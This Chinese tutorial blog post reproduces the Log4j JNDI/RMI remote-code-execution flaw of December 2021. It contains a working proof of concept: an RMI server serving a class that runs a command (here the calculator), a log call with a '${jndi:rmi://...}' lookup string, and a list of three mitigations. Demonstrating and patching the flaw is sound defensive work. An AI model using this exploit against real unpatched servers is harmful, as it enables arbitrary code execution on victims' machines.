Java RMI引起的log4j漏洞问题重现

目录

• RMI和JNDIRMI
• 模拟漏洞重现
• 【紧急补救措施3选1】

2021-12-10日左右，java的log4j框架出现了一个大漏洞，对服务器案例引起了不小的影响，当然只对于log4j的日志使用者来说，如果你是spring框架，用的是logback，不存在这个问题。

RMI和JNDIRMI

• （Remote Method Invocation） 即Java远程方法调用，一种用于实现远程过程调用的应用程序编程接口
• JNDI (Java Naming and Directory Interface)是一个应用程序设计的API，为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接口
• JNDI和RMI的主要关系是RMI注册的服务可以通过JNDIAPI访问。在讨论到Spring反序列化漏洞之前，先看看如果通过JNDI来调用RMI注册的服务。

模拟漏洞重现

pom依赖

    
            org.springframework.boot
            spring-boot-starter-web
            
                
                    org.springframework.boot
                    spring-boot-starter-logging
                
            
        

        
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        

黑客端

/**
 * 构建RMI服务来响应恶意代码
 * 

 * Java RMI，即 远程方法调用（Remote Method Invocation），一种用于实现远程过程调用(RPC)的Java API， 能直接传输序列化后的Java对象和分布式垃圾收集。它的实现依赖于(JVM)，因此它仅支持从一个JVM到另一个JVM的调用。
 */
public class RMIServer {
  @SneakyThrows
  public static void main(String... args) {
    try {
      // 本地主机上的远程对象注册表Registry的实例,默认端口1099
      LocateRegistry.createRegistry(1099);
      Registry registry = LocateRegistry.getRegistry();
      System.out.println("Create RMI registry on port 1099");
      //返回的Java对象
      Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null);
      ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
      // 把远程对象注册到RMI注册服务器上，并命名为evil
      registry.bind("evil", referenceWrapper);
    } catch (RemoteException | AlreadyBoundException | NamingException e) {
      e.printStackTrace();
    }
  }

/**
 * 执行任意的脚本，目前的脚本会使windows服务器打开计算器.
 */
public class EvilCode {
  static {
    System.out.println("受害服务器将执行下面命令行");
    Process p;

    String[] cmd = {"calc"};
    try {
      p = Runtime.getRuntime().exec(cmd);
      InputStream fis = p.getInputStream();
      InputStreamReader isr = new InputStreamReader(fis);
      BufferedReader br = new BufferedReader(isr);
      String line = null;
      while ((line = br.readLine()) != null) {
        System.out.println(line);
      }
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
}

网站端

public class Server {
  private static final Logger logger = LogManager.getLogger();

  public static void main(String[] args) {
    String name = "${java:runtime}";
    logger.info("name:{}", name);
    //模拟填写数据,输入构造好的字符串,使受害服务器打印日志时执行远程的代码 同一台可以使用127.0.0.1
    String username = "${jndi:rmi://127.0.0.1:1099/evil}";
    //正常打印业务日志
    logger.error("username:{}", username);

  }
}

【紧急补救措施3选1】

• 修改 JVM 参数 -Dlog4j2.formatMsgNoLookups=true
• 修改配置 log4j2.formatMsgNoLookups=True
• 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true

到此这篇关于java RMI引起的log4j漏洞的文章就介绍到这了,更多相关java RMI 漏洞内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家！